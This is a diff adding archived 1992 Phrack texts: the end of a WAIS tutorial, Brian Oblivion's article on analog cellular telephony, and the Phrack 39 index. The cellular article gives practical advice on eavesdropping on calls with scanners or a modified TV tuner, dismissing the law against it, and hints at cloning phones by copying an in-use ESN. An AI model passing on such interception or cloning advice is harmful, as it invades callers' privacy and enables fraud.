+    Database: /src/wais/wais-sources/phrack
+        Cost: 0
+       Units: :free
+  Maintainer: mycroft@hal.gnu.ai.mit.edu
+ Description:
+.+------------------------------------------------------------------------.
+||Server created with WAIS release 8 b3.1 on Jan 31 12:30:28 1992 by mycro|
+||                                                                        |
+||Here are all the issues of Phrack for your edification.                 |
+||                                                                        |
+||Phrack is an old hacking, cracking, phreaking, and general anarchy      |
+||newsletter.  Articles range from how the phone system works to making   |
+||------------------------------------------------------------------------|
+`+------------------------------------------------------------------------'
+.----. .------.
+|Save| |Cancel|
+`----' `------'
+
+The fields work like this:
+
+    Name:  Filename to store this source under on *your* machine.
+    Server, Service, Database:  Where the source lives (my machine).
+    Cost, Units:  How much it will cost you to access the information.
+    Maintainer:  Me!
+    Description:  What is there.
+
+     You really want this one, so just click the "Save" button.  This will
+create a "source file" on your machine, which you can then access with the "Add
+Source" button of the question window.  This setup is sort of a lose, because
+your copy could get out of date and not work.  I've proposed a way to fix this
+problem, but so far it hasn't been implemented.  This bit me once when I moved
+the files to their current location.
+
+
+ Step 3:  A Query
+ ~~~~~~~~~~~~~~~~
+     Now, let's make another query.  I can't remember where I saw this, so:
+
+ Tell me about:
+.----------------------------------------------------------------. .------.
+|that night with tuc                                             | |Search|
+`----------------------------------------------------------------' `------'
+ In Sources:                Similar to:
+.------------------------. .----------------------------------------------.
+|phrack.src              | |                                              |
+`------------------------' `----------------------------------------------'
+.----------. .-------------. .------------+ .---------------. .----. .----.
+|Add Source| |Delete Source| |Add Document| |Delete Document| |Help| |Done|
+`----------' `-------------' `------------' `---------------' `----' `----'
+           .+------------------------------------------------------------.
+ Resulting  || 1000 24.9K "Phrack World News Issue XIV, Part 2", compiled |
+ documents: ||  967 29.9K "Phrack World News Special Edition III", compile|
+.----.      ||  800 74.9K "Phrack World News Special Edition II", compiled|
+|View|      ||  467  6.1K "Phrack Pro-Phile V: Tuc", by Taran King (issue |
+`----'      `+------------------------------------------------------------'
+      .-----------------------------------------------------------------.
+Status: |Found 40 documents.                                            |
+      `-----------------------------------------------------------------'
+
+     All you have to do is double-click on one of the documents.  After a while
+you'll get another window:
+
+.+------------------------------------------------------------------------.
+||                                                                        |
+||"Phrack World News Issue XIV, Part 2", compiled by Knight Lightning (iss|
+||                                                                        |
+||                                                                        |
+||          PWN ^*^ PWN ^*^ PWN { SummerCon '87 } PWN ^*^ PWN ^*^ PWN     |
+||          ^*^                                                   ^*^     |
+||          PWN                Phrack World News                  PWN     |
+||          ^*^                   Issue XIV/2                     ^*^     |
+||          PWN                                                   PWN     |
+||          ^*^               "SummerCon Strikes"                 ^*^     |
+||          PWN                                                   PWN     |
+||------------------------------------------------------------------------|
+`+------------------------------------------------------------------------'
+.-----------. .--------. .----. .--------. .------------. .----.
+|Add Section| |Find Key| |Next| |Previous| |Save To File| |Done|
+`-----------' `--------' `----' `--------' `------------' `----'
+
+     Status:
+
+     The "Add Section" button is used for relevance feedback.  You select a
+region of text and press "Add Section" and it will show up in the "Similar to:"
+box in the question window.
+
+     "Find Key," "Next," and "Previous" are used to search for the keywords in
+the document.  The rest is pretty obvious.
+
+
+ What Else?
+ ~~~~~~~~~~
+     There are more powerful ways to use WAIS.  For example, using the "waisq"
+and "waisretrieve" programs, you could query the directory of servers nightly
+to get the latest copy of phrack.src.  This would ensure that yours is never
+more than a day out of date.  (I recommend subscribing to the wais-discussion
+list and/or reading alt.wais instead, though, since it's more interesting and
+won't put a load on the directory of servers.)
+
+     Or if you keep an archive of your mail, you could use it to index that.
+(I know several people who do this, including Brewster.)
+
+     Or whatever.  Take a look at some of the existing sources to get an idea.
+
+
+ Conclusion
+ ~~~~~~~~~~
+     WAIS is a very useful tool for finding information.  It is still under
+development, though, and there a few rough edges that need to be worked out.
+In particular:
+
+     * Source files getting out of date.
+     * Multiple servers for a single source (for reliability and speed).
+     * Multiple indices for the same source on a given server (for transient
+       information).
+     * Index overhead.  (The Phrack index, for example, is currently larger
+       than the text itself!)
+_______________________________________________________________________________
diff --git a/phrack38/9.txt b/phrack38/9.txt
new file mode 100644
index 0000000..866df3a
--- /dev/null
+++ b/phrack38/9.txt
@@ -0,0 +1,558 @@
+                                ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Eight, File 9 of 15
+
+  ***************************************************************************
+  *                                                                         *
+  *                            Cellular Telephony                           *
+  *                                                                         *
+  *                                    by                                   *
+  *                               Brian Oblivion                            *
+  *                                                                         *
+  *                                                                         *
+  * Courtesy of:       Restricted-Data-Transmissions (RDT)                  *
+  *                  "Truth Is Cheap, But Information Costs."               *
+  *                                                                         *
+  *                                                                         *
+  ***************************************************************************
+
+The benefit of a mobile transceiver has been the wish of experimenters since
+the late 1800's.  To have the ability to be reached by another man despite
+location, altitude, or depth has had high priority in communication technology
+throughout its history.  Only until the late 1970's has this been available to
+the general public.  That is when Bell Telephone (the late Ma Bell) introduced
+the Advanced Mobile Phone Service, AMPS for short.
+
+Cellular phones today are used for a multitude of different jobs.  They are
+used in just plain jibber-jabber, data transfer (I will go into this mode of
+cellular telephony in depth later), corporate deals, surveillance, emergencies,
+and countless other applications.  The advantages of cellular telephony to the
+user/phreaker are obvious:
+
+1.  Difficulty of tracking the location of a transceiver (especially if the
+    transceiver is on the move) makes it very difficult to locate.
+
+2.  Range of the unit within settled areas.
+
+3.  Scrambling techniques are feasible and can be made to provide moderate
+    security for most transmissions.
+
+4.  The unit, with modification can be used as a bug, being called upon by the
+    controlling party from anywhere on the globe.
+
+5.  With the right knowledge, one can modify the cellular in both hardware and
+    software to create a rather diversified machine that will scan, store and
+    randomly change.
+
+6.  ESN's per call thereby making detection almost impossible.
+
+
+I feel it will be of great importance for readers to understand the background
+of the Cellular phone system, mainly due to the fact that much of the
+pioneering systems are still in use today.  The first use of a mobile radio
+came about in 1921 by the Detroit police department.  This system operated at
+2MHz.  In 1940, frequencies between 30 and 40MHz were made available too and
+soon became overcrowded.  The trend of overcrowding continues today.
+
+In 1946, the FCC declared a "public correspondence system" called, or rather
+classified as "Domestic Public Land Mobile Radio Service" (DPLMRS) at 35 - 44
+MHz band that ran along the highway between New York and Boston.  Now the 35-
+44MHz band is used mainly by Amateur radio hobbyists due to the bands
+susceptibility to skip-propagation.
+
+These early mobile radio systems were all PTT (push-to-talk) systems that did
+not enjoy today's duplex conversations.  The first real mobile "phone" system
+was the "Improved Mobile Telephone Service" or the IMTS for short, in 1969.
+This system covered the spectrum from 150 - 450MHz, sported automatic channel
+selection for each call, eliminated PTT, and allowed the customer to do their
+own dialing.  From 1969 to 1979 this was the mobile telephone service that
+served the public and business community, and it is still used today.
+
+        IMTS frequencies used (MHz):
+
+        Channel         Base Frequency          Mobile Frequency
+
+        VHF Low Band
+
+        ZO              35.26                   43.26
+        ZF              35.30                   43.30
+        ZH              35.34                   43.34
+        ZA              35.42                   43.32
+        ZY              34.46                   43.46
+        ZC              35.50                   43.50
+        ZB              35.54                   43.54
+        ZW              35.62                   43.62
+        ZL              35.66                   43.66
+
+        VHF High Band
+
+        JL              152.51                  157.77
+        YL              152.54                  157.80
+        JP              152.57                  157.83
+        YP              152.60                  157.86
+        YJ              152.63                  157.89
+        YK              152.66                  157.92
+        JS              152.69                  157.95
+        YS              152.72                  157.98
+        YA              152.75                  158.01
+        JK              152.78                  158.04
+        JA              152.81                  158.07
+
+        UHF Band
+
+        QC              454.375                 459.375
+        QJ              454.40                  459.40
+        QO              454.425                 459.425
+        QA              454.45                  459.45
+        QE              454.475                 459.475
+        QP              454.50                  459.50
+        QK              454.525                 459.525
+        QB              454.55                  459.55
+        QO              454.575                 459.575
+        QA              454.60                  459.60
+        QY              454.625                 459.625
+        QF              454.650                 459.650
+
+VHF high frequencies are the most popular frequencies of all the IMTS band.
+VHF low bands are used primarily in rural areas and those with hilly terrain.
+UHF bands are primarily used in cities where the VHF bands are overcrowded.
+Most large cities will find at least one station being used in their area.
+
+ADVANCED MOBILE PHONE SYSTEM
+
+The next step for mobile telephone was made in 1979 by Bell Telephone, again
+introducing the Advanced Mobile Phone Service.  This service is the focus of
+this document, which has now taken over the mobile telephone industry as the
+standard.  What brought this system to life were the new digital technologies
+of the 1970's.  This being large scale integrated custom circuits and
+microprocessors.  Without these technologies, the system would not have been
+economically possible.
+
+The basic elements of the cellular concept have to do with frequency reuse and
+cell splitting.
+
+Frequency re-use refers to the use of radio channels on the same carrier
+frequency to cover different areas which are separated by a significant
+distance.  Cell splitting is the ability to split any cell into smaller cells
+if the traffic of that cell requires additional frequencies to handle all the
+area's calls.  These two elements provide the network an opportunity to handle
+more simultaneous calls, decrease the transmitters/receivers output/input
+wattage/gain and a more universal signal quality.
+
+When the system was first introduced, it was allocated 40MHz in the frequency
+spectrum, divided into 666 duplex radio channels providing about 96 channels
+per cell for the seven cluster frequency reuse pattern.  Cell sites (base
+stations) are located in the cells which make up the cellular network.  These
+cells are usually represented by hexagons on maps or when developing new
+systems and layouts.  The cell sites contain radio, control, voice frequency
+processing and maintenance equipment, as well as transmitting and receiving
+antennas.  The cell sites are inter-connected by landline with the Mobile
+Telecommunications Switching Office (MTSO).
+
+In recent years, the FCC has added 156 frequencies to the cellular bandwidth.
+This provides 832 possible frequencies available to each subscriber per cell.
+All new cellular telephones are built to accommodate these new frequencies, but
+old cellular telephones still work on the system.  How does a cell site know if
+the unit is old or new?  Let me explain.
+
+The problem of identifying a cellular phones age is done by the STATION CLASS
+MARK (SCM).  This number is 4 bits long and broken down like this:
+
+                Bit 1:  0 for 666 channel usage (old)
+                        1 for 832 channel usage (new)
+
+                Bit 2:  0 for a mobile unit (in vehicle)
+                        1 for voice-activated transmit (for portables)
+
+                Bit 3-4:  Identify the power class of the unit
+
+    Class I    00 = 3.0 watts Continuous Tx's   00XX...DTX <> 1
+    Class II   01 = 1.2 watts Discont. Tx's     01XX...DTX =  1
+    Class III  10 = 0.6 watts reserved          10XX, 11XX
+    Reserved   11 = ---------                   Letters DTX set to 1 permits
+                                                use of discontinuous trans-
+                                                missions
+
+
+Cell Sites:  How Cellular Telephones Get Their Name
+
+Cell sites, as mentioned above are laid out in a hexagonal type grid.  Each
+cell is part of a larger cell which is made up of seven cells in the following
+fashion:
+
+           |---|      ||===||      |---|       |---|       |---|       |---
+          /     \    //     \\    /     \     /     \     /     \     /
+         |       |===||  2  ||===||     ||===||      |---|       |---|
+          \     //    \     /     \\   //     \\    /     \     /     \
+           |---||  7   |---|   3   ||==||  2   ||==||  pc |---|       |---|
+          /     \\    /     \     //    \     /     \\      Due to the      \
+         |      ||---|   1   |---||  7   |---|   3   ||--|  difficulty of    |
+          \    //     \     /     \\    /     \     //    \ representing    /
+           |--||   6   |---|   4   ||--|   1   |---||      |graphics with  |
+          /    \\     /     \     //    \     /     \\    / ASCII characters\
+         |      ||==||   5   ||==||  6   |---|   4   ||--|  I will only show |
+          \     /    \\     //    \\    /     \     //    \ two of the cell /
+           |---|      ||===||     ||===||  5   ||==||      |types I am trying-
+          /     \     /     \     /     \\    //    \     / to convey.      \
+         |       |---|       |---|       ||==||      |---|       |---|       |
+          \     /     \     /     \     /     \     /     \     /     \     /
+           |---|       |---|       |---|       |---|       |---|       |---|
+
+As you can see, each cell is a 1/7th of a larger cell.  Where one (1) is the
+center cell and two (2) is the cell directly above the center.  The other cells
+are number around the center cell in a clockwise fashion, ending with seven
+(7).  The cell sites are equipped with three directional antennas with an RF
+beamwidth of 120 degrees providing 360 degree coverage for that cell.  Note
+that all cells never share a common border.  Cells which are next to each other
+are obviously never assigned the same frequencies.  They will almost always
+differ by at least 60 KHz.  This also demonstrates the idea behind cell
+splitting.  One could imagine that the parameter of one of the large cells was
+once one cell.  Due to a traffic increase, the cell had to be sub-divided to
+provide more channels for the subscribers.  Note that subdivisions must be made
+in factors of seven.
+
+There are also Mobile Cell sites, which are usually used in the transitional
+period during the upscaling of a cell site due to increased traffic.  Of
+course, this is just one of the many uses of this component.  Imagine you are
+building a new complex in a very remote location.  You could feasibly install a
+few mobile cellular cell sites to provide a telephone-like network for workers
+and executives.  The most unique component would be the controller/transceiver
+which provides the communications line between the cell site and the MTSO.  In
+a remote location such a link could very easily be provided via satellite
+up/down link facilities.
+
+Let's get into how the phones actually talk with each other.  There are several
+ways and competitors have still not set an agreed upon standard.
+
+Frequency Division Multiple Access (FDMA)
+
+This is the traditional method of traffic handling.  FDMA is a single channel
+per carrier analog method of transmitting signals.  There has never been a
+definite set on the type of modulation to be used.  There are no regulations
+requiring a party to use a single method of modulation.  Narrow band FM, single
+sideband AM, digital, and spread-spectrum techniques have all been considered
+as a possible standard, but none have yet to be chosen.
+
+FDMA works like this:  Cell sites are constantly searching out free channels to
+start out the next call.  As soon as a call finishes, the channel is freed up
+and put on the list of free channels.  Or, as a subscriber moves from one cell
+to another, the new cell they are in will hopefully have an open channel to
+receive the current call in progress and carry it through its location.  This
+process is called handoff, and will be discussed more in depth further along.
+
+Other proposed traffic handling schemes include Time-Division Multiple Access
+(TDMA), Code-Division Multiple Access (CDMA), and Time-Division/Frequency
+Division Multiple Access (TD/FDMA).
+
+Time Division Multiple Access
+
+With TDMA, calls are simultaneously held on the same channels, but are
+multiplexed between pauses in the conversation.  These pauses occur in the way
+people talk and think, and the telephone company also injects small delays on
+top of the conversation to accommodate other traffic on that channel.  This
+increase in the length of the usual pause results in a longer amount of time
+spent on the call.  Longer calls result in higher costs of the calls.
+
+Code Division Multiple Access
+
+This system has been used in mobile military communications for the past 35
+years.  This system is digital and breaks up the digitized conversation into
+bundles, compresses, sends, then decompresses and converts back into analog.
+There are said increases of throughput of 20 : 1 but CDMA is susceptible to
+interference which will result in packet retransmission and delays.  Of course,
+error correction can help in data integrity, but will also result in a small
+delay in throughput.
+
+Time-Division/Frequency Division Multiple Access
+
+TD/FDMA is a relatively new system which is an obvious hybrid of FDMA and TDMA.
+This system is mainly geared towards the increase of digital transmission over
+the cellular network.  TD/FDMA make it possible to transmit signals from base
+to mobile without disturbing the conversation.  With FDMA, there are
+significant disturbances during handoff which prevent continual data
+transmission from site to site.  TD/FDMA makes it possible to transmit control
+signals by the same carrier as the data/voice thereby ridding extra channel
+usage for control.
+
+
+Cellular Frequency Usage and channel allocation
+
+
+There are 832 cellular phone channels which are split into two separate bands.
+Band A consists of 416 channels for non-wireline services.  Band B consists
+equally of 416 channels for wireline services.  Each of these channels are
+split into two frequencies to provide duplex operation.  The lower frequency is
+for the mobile unit while the other is for the cell site.  21 channels of each
+band are dedicated to "control" channels and the other 395 are voice channels.
+You will find that the channels are numbered from 1 to 1023, skipping channels
+800 to 990.
+
+I found these handy-dandy equations that can be used for calculating
+frequencies from channels and channels from frequencies.
+
+        N = Cellular Channel #          F = Cellular Frequency
+        B = 0 (mobile) or B = 1 (cell site)
+
+
+
+        CELLULAR FREQUENCIES from CHANNEL NUMBER:
+
+
+        F = 825.030 + B * 45 + ( N + 1 ) * .03
+                where:  N = 1 to 799
+
+        F = 824.040 + B * 45 + ( N + 1 ) * .03
+                where:  N = 991 to 1023
+
+
+
+        CHANNEL NUMBER from CELLULAR FREQUENCIES
+
+
+        N = 1 + (F - 825.030 - B * 45) / .03
+
+                where:  F >= 825.000 (mobile)
+                     or F >= 870.030 (cell site)
+
+        N = 991 + (F - 824.040 - B * 45) / .03
+
+                where:  F <= 825.000 (mobile)
+                     or F <= 870.000 (base)
+
+
+Now that you have those frequencies, what can you do with them?  Well, for
+starters, one can very easily monitor the cellular frequencies with most
+hand/base scanners.  Almost all scanners pre-1988 have some coverage of the
+800 - 900 MHz band.  All scanners can monitor the IMTS frequencies.
+
+Remember that cellular phones operate on a full duplex channel.  That means
+that one frequency is used for transmission and the other is used for
+receiving, each spaced exactly 30 KHz apart.  Remember also that the base
+frequencies are 45MHz higher than the cellular phone frequencies.  This can
+obviously make listening rather difficult.  One way to listen to both parts of
+the conversation would be having two scanners programmed 45 MHz apart to
+capture the entire conversation.
+
+The upper UHF frequency spectrum was "appropriated" by the Cellular systems in
+the late 1970's.  Televisions are still made to receive up to channel 83.  This
+means that you can receive much of the cellular system on you UHF receiver. One
+television channel occupies 6MHz of bandwidth.  This was for video, sync, and
+audio transmission of the channel.  A cellular channel only takes up 24 KHz
+plus 3KHz set up as a guard band for each audio signal.  This means that 200
+cellular channels can fit into one UHF television channel.  If you have an old
+black and white television, drop a variable cap in there to increase the
+sensitivity of the tuning.  Some of the older sets have coarse and fine tuning
+knobs.
+
+Some of the newer, smaller, portable television sets are tuned by a variable
+resistor.  This make modifications MUCH easier, for now all you have to do is
+drop a smaller value pot in there and tweak away.  I have successfully done
+this on two televisions.  Most users will find that those who don't live in a
+city will have a much better listening rate per call.  In the city, the cells
+are so damn small that handoff is usually every other minute.  Resulting in
+chopped conversations.
+
+If you wanted to really get into it, I would suggest you obtain an old
+television set with decent tuning controls and remove the RF section out of the
+set.  You don't want all that hi-voltage circuitry lying around (flyback and
+those caps).  UHF receivers in televisions downconvert UHF frequencies to IF
+(intermediate frequencies) between 41 and 47 MHz.  These output IF frequencies
+can then be run into a scanner set to pick-up between 41 - 47 MHz.  Anyone who
+works with RF knows that it is MUCH easier to work with 40MHz signals than
+working with 800MHz signals.  JUST REMEMBER ONE THING!  Isolate the UHF
+receiver from your scanner by using a coupling capacitor (0.01 - 0.1 microfarad
+<50V minimum> will do nicely).  You don't want any of those biasing voltages
+creeping into your scanner's receiving AMPLIFIERS!  Horrors.  Also, don't
+forget to ground both the scanner and receiver.
+
+Some systems transmit and receive the same cellular transmission on the base
+frequencies.  There you can simply hang out on the base frequency and capture
+both sides of the conversation.  The handoff rate is much higher in high
+traffic areas leading the listener to hear short or choppy conversations.  At
+times you can listen in for 5 to 10 minutes per call, depending on how fast the
+caller is moving through the cell site.
+
+         TV          Cell & Channel   Scanner    TV Oscillator     Band
+        Channel      Freq.& Number    Frequency  Frequency        Limit
+        ===================================================================
+         73 (first)  0001 - 825.03     45.97        871         824 - 830
+         73 (last)   0166 - 829.98     41.02        871         824 - 830
+         74 (first)  0167 - 830.01     46.99        877         830 - 836
+         74 (last)   0366 - 835.98     41.02        877         830 - 836
+         75 (first)  0367 - 836.01     46.99        883         836 - 842
+         75 (last)   0566 - 841.98     41.02        883         836 - 842
+         76 (first)  0567 - 842.01     46.99        889         842 - 848
+         76 (last)   0766 - 847.98     41.02        889         842 - 848
+         77 (first)  0767 - 848.01     46.99        895         848 - 854
+         77 (last)   0799 - 848.97     46.03        895         848 - 854
+
+         All frequencies are in MHz
+
+You can spend hours just listening to cellular telephone conversations, but I
+would like to mention that it is illegal to do so.  Yes, it is illegal to
+monitor cellular telephone conversations.  It just another one of those laws
+like removing tags off of furniture and pillows.  It's illegal, but what the
+hell for?  At any rate, I just want you to understand that doing the following
+is in violation of the law.
+
+Now back to the good stuff.
+
+Conversation is not only what an avid listener will find on the cellular bands.
+One will also hear call/channel set-up control data streams, dialing, and other
+control messages.  At times, a cell site will send out a full request for all
+units in its cell to identify itself.  The phone will then respond with the
+appropriate identification on the corresponding control channel.
+
+Whenever a mobile unit is turned on, even when not placing a call, whenever
+there is power to the unit, it transmits its phone number and its 8-digit ID
+number.  The same process is done when an idling phone passes from one cell to
+the other.  This process is repeated for as long as there is power to the unit.
+This allows the MTSO to "track" a mobile through the network.  That is why it
+is not a good reason to use a mobile phone from one site.  They do have ways of
+finding you.  And it really is not that hard.  Just a bit of RF Triangulation
+theory and you're found.  However, when the power to the unit is shut off, as
+far as the MTSO cares, you never existed in that cell, of course unless your
+unit was flagged for some reason.  MTSO's are basically just ESS systems
+designed for mobile applications.  This will be explained later within this
+document.
+
+It isn't feasible for the telephone companies to keep track of each customer on
+the network.  Therefore the MTSO really doesn't know if you are authorized to
+use the network or not.  When you purchase a cellular phone, the dealer gives
+the unit's phone ID number to the local BOC, as well as the number the BOC
+assigned to the customer.  When the unit is fired up in a cell site its ID
+number and phone number are transmitted and checked.  If the two numbers are
+registered under the same subscriber, then the cell site will allow the mobile
+to send and receive calls.  If they don't match, then the cell will not allow
+the unit to send or receive calls.  Hence, the most successful way of
+reactivating a cellular phone is to obtain an ID that is presently in use and
+modifying your ROM/PROM/EPROM for your specific phone.
+
+RF and AF Specifications:
+
+Everything that you will see from here on out is specifically Industry/FCC
+standard.  A certain level of compatibility has to be maintained for national
+intercommunications, therefore a common set of standards that apply to all
+cellular telephones can be compiled and analyzed.
+
+        Transmitter Mobiles:  audio transmission
+
+        - 3 KHz to 15 KHz and 6.1 KHz to 15 KHz.
+        - 5.9 KHz to 6.1 KHz 35 dB attenuation.
+        - Above 15 KHz, the attenuation becomes 28 dB.
+        - All this is required after the modulation limiter and before the
+          modulation stage.
+
+        Transmitters Base Stations:  audio transmission
+
+        - 3 KHz to 15 KHz.
+        - Above 15 KHz, attenuation required 28 dB.
+        - Attenuation after modulation limiter - no notch filter required.
+
+        RF attenuation below carrier transmitter:  audio transmission
+
+        - 20 KHz to 40 KHz, use 26 dB.
+        - 45 KHz to 2nd harmonic, the specification is 60 dB or 43 + 10 log of
+          mean output power.
+        - 12 KHz to 20 KHz, attenuation 117 log f/12.
+        - 20 KHz to 2nd harmonic, there is a choice:  100 log F/100 or 60 dB or
+          43 log + 10 log of mean output power, whichever is less.
+
+        Wideband Data
+
+        - 20 KHz to 45 KHz, use 26 dB.
+        - 45 KHz to 90 KHz, use 45 dB.
+        - 90 KHz to 2nd harmonic, either 60 dB or 43 + 10 log mean output
+          power.
+        - all data streams are encoded so that NRZ (non-return-to-zero) binary
+          ones and zeroes are now zero-to-one and one-to-zero transitions
+          respectively.  Wideband data can then modulate the transmitter
+          carrier by binary frequency shift keying (BFSK) and ones and zeroes
+          into the modulator must now be equivalent to nominal peak frequency
+          deviations of 8 KHz above and below the carrier frequency.
+
+        Supervisory Audio Tones
+
+        -  Save as RF attenuation measurements.
+
+        Signaling Tone
+
+        - Same as Wideband Data but must be 10 KHz +/- 1 Hz and produce a
+          nominal frequency deviation of +/- 8 KHz.
+
+
+The previous information will assist any technophile to modify or even
+troubleshoot his/her cellular phone.  Those are the working guidelines, as I
+stated previously.
+
+
+UNIT IDENTIFICATION
+
+Each mobile unit is identified by the following sets of numbers.
+
+The first number is the Mobile Identification Number (MIN).  This 34 bit binary
+number is derived from the unit's telephone number.  MIN1 is the last seven
+digits of the telephone number and MIN2 is the area code.
+
+For demonstrative purposes, we'll encode 617-637-8687.
+
+Here's how to derive the MIN2 from a standard area code.  In this example, 617
+is the area code.  All you have to do is first convert to modulo 10 using the
+following function.  A zero digit would be considered to have a value of 10.
+
+                100(first number) + 10(second) +1(third) - 111 = x
+
+                        100(6) + 10(1) + 1(7) - 111 = 506
+
+                  (or you could just - 111 from the area code.)
+
+        Then convert it to a 10-bit binary number:  0111111010.
+
+        To derive MIN1 from the phone number is equally as simple.  First
+        encode the next three digits, 637.
+
+                       100(6) + 10(3) + 1(7) - 111 = 526
+
+        Converted to binary:  1000001110
+
+        The remainder of the number 8687, is processed further by taking the
+        first digit, eight (8) and converting it directly to binary.
+
+                        8 = 1000 (binary)
+
+        The last three digits are processed as the other two sets of three
+        numbers were processed.
+
+                       100(6) + 10(8) + 1(7) - 111 = 576
+
+        Converted to binary:  1001000000.
+
+        So the completed MIN number would look like this:
+
+            |--637---||8-||---687--||---617--|
+            1000001110100010010000000111111010
+            \________/\__/\________/\________/
+
+
+A unit is also identifiable by its Electronic Serial Number or ESN.  This
+number is factory preset and is usually stored in a ROM chip, which is soldered
+to the board.  It may also be found in a "computer on a chip," which are the
+new microcontrollers which have ROM/RAM/microprocessor all in the same package.
+This type of set-up usually has the ESN and the software to drive the unit all
+in the same chip.  This makes is significantly harder to dump, modify and
+replace.  But it is far from impossible.
+
+The ESN is a 4 byte hex or 11-digit octal number.  I have encountered mostly
+11-digit octal numbers on the casing of most cellular phones.  The first three
+digits represent the manufacturer and the remaining eight digits are the unit's
+ESN.
+
+The Station Class Mark (SCM) is also used for station identification by
+providing the station type and power output rating.  This was already discussed
+in a previous section.
+
+The System IDentification (SID number is a number which represents the mobile's
+home system.  This number is 15-bits long and a list of current nationwide
+SID's should either be a part of this file or it will be distributed along with
+it.
+_______________________________________________________________________________
diff --git a/phrack39/1.txt b/phrack39/1.txt
new file mode 100644
index 0000000..d3ddb81
--- /dev/null
+++ b/phrack39/1.txt
@@ -0,0 +1,232 @@
+                                ==Phrack Inc.==
+
+                  Volume Four, Issue Thirty-Nine, File 1 of 13
+
+                               Issue XXXIX Index
+                              ___________________
+
+                               P H R A C K   3 9
+
+                                 June 26, 1992
+                              ___________________
+
+                         ~You're Not Dealing With AT&T~
+
+Welcome to Phrack 39.  This will be the final issue before SummerCon '92.
+Details of SummerCon will appear in our special anniversary issue due late this
+summer -- Phrack 40.  Rumor also has it that the next issue of Mondo 2000 will
+contain some type of coverage about SummerCon as well!
+
+Phrack has been receiving an enormous amount of mail containing questions and
+comments from our readers and we really appreciate the attention, but we don't
+know what to do with it all.  Phrack Loopback was created to address letters of
+this sort, but in a lot of cases, the senders of the mail are not indicating if
+their question is to be posted to Loopback or if they are to be identified as
+the author of their question in Loopback.
+
+Dispater has been moving all across the country over the past couple of months,
+which is the primary reason for the delay in releasing this issue.  However,
+now that he is settled, the fun is about to begin.  He will be responding to
+your mail very soon and hopefully this will all be sorted out by issue 40.
+For right now, you can enjoy a variety of special interest articles and letters
+in this issue's Loopback, including "A Review of Steve Jackson Games' HACKER"
+by Deluge.  Special thanks goes out to Mentor and Steve Jackson for a copy of
+the game and the totally cool looking poster.  "Association of Security
+Sysadmins" is my favorite!  ;)
+
+Another problem situation that needs to be mentioned has to do with would-be
+subscribers.  For some reason the "phracksub@stormking.com" account has been
+receiving hundreds of requests from people who want to be added to the
+subscription list.  This isn't how it works.  You must subscribe yourself, we
+can't and won't do it for you.  The instructions are included later in this
+file.  Up till this point we have been informing people of their error and
+mailing them the instructions, but we will ignore these requests from now on.
+Anyone with an intelligence level high enough to enjoy Phrack should be capable
+of figuring out how to subscribe.
+
+Phrack Pro-Phile focuses on Shadow Hawk 1 -- The first hacker ever to be
+prosecuted under the Computer Fraud & Abuse Act of 1986.  A lot of people don't
+realize that Robert Morris, Jr. was not the first because Shadow Hawk 1 was
+tried as a minor and therefore a lot of details in his case are not publicly
+known.  Something to point out however is that the same people (William J. Cook
+and Henry Klupfel) that were responsible for prosecuting SH1 in 1989, came back
+in 1990 to attack Knight Lightning... but this time the government and Bellcore
+didn't fare as well and now both Cook and Klupfel (among others) are being sued
+in Federal Court in Austin, Texas (See Steve Jackson Games v. United States).
+
+Now, before anyone starts flying off their keyboards screaming about our
+article "Air Fone Frequencies" by Leroy Donnelly, we will let you know what's
+what.  Yes, the same article did recently appear in Informatik, however, both
+publications received it from the same source (Telecom Digest) and Informatik
+just had an earlier release date.  At Phrack, we feel that the information was
+interesting and useful enough that our readers deserved to see it and we do not
+assume by any means that everyone on the Phrack list is also a reader of
+publications like Telecom Digest or Informatik.
+
+Phrack's feature article in this issue is "The Complete Guide To The DIALOG
+Information Network" by Brian Oblivion.  Our undying gratitude to Mr. Oblivion
+for his consistency in providing Phrack and its readers with entertaining
+quality articles... and we're told that the best is yet to come.
+
+Longtime fans of Phrack might recall that Phrack 9 had an article on Dialog
+services and it also had an article on Centigram Voice Mail.  Now 30 issues
+later, both topics are resurrected in much greater detail.
+
+You will also note that the Centigram article in this issue is penned under the
+pseudonym of ">Unknown User<," a name that was adopted from the anonymous
+posting feature of the Metal Shop Private bulletin board (the birthplace of
+Phrack, sysoped by Taran King during 1985-1987).  The name ">Unknown User<" has
+traditionally been reserved for authors who did not wish to be identified in
+any capacity other than to the Phrack editors.  In this case, however, even the
+staff at Phrack has absolutely no idea who the author of this file is because
+of the unique way of SMTP Fakemail it was delivered.
+
+No Pirates' Cove in this issue.  Be watching for the next Pirates' Cove in
+Phrack 40.
+
+                                - - - - - - - -
+
+Knight Lightning recently spoke at the National Computer Security Association's
+Virus Conference in Washington, D.C.  His presentation panel which consisted
+of himself, Winn Schwartau (author of Terminal Compromise), and Michael
+Alexander (chief editor of ISPNews and formally an editor and reporter for
+ComputerWorld) was very well received and the people attending the conference
+appeared genuinely interested in learning about the hacking community and
+computer security.  KL remarked that he felt really good about the public's
+reaction to his presentation because "its the first time, I've agreed to be on
+one of these panels and someone in the audience hasn't made accusatory or
+derogatory remarks."
+
+                    "It's inappropriate for you to be here."
+
+This was the warm reception KL and a few others received upon entering the
+room where the secret midnight society anti-virus group was holding a meeting.
+It appears that a small number of anti-virus "experts" have decided to embark
+on a mission to rid the country of computer bulletin boards that allow the
+dissemination of computer viruses... by any means possible, including the
+harassment of the sysops (or the sysops' parents if the operator is a minor).
+
+At Phrack, some of us feel that there are no good viruses and are opposed to
+their creation and distribution.  Others of us (e.g. Dispater) just think
+viruses are almost as boring as the people who make a carear out of
+exterminating them.  However, we do not agree with the method proposed by this
+organization and will be watching.
+
+                              - - - - - - - - - -
+
+Special thanks for help in producing this issue:
+
+     Beta-Ray Bill                            Crimson Flash (512)
+     Datastream Cowboy                        Deluge
+     Dispater, EDITOR                         Dokkalfar
+     Frosty (of CyberSpace Project)           Gentry
+     The Iron Eagle (of Australia)            JJ Flash
+     Knight Lightning, Founder                Mr. Fink
+     The Omega [RDT][-cDc-]                   The Public
+     Rambone                                  Ripper of HALE
+     Tuc                                      White Knight [RDT][-cDc-]
+
+                         We're Back and We're Phrack!
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                      HOW TO SUBSCRIBE TO PHRACK MAGAZINE
+
+     The distribution of Phrack is now being performed by the software called
+Listserv.  All individuals on the Phrack Mailing List prior to your receipt of
+this letter have been deleted from the list.
+
+If you would like to re-subscribe to Phrack Inc. please follow these
+instructions:
+
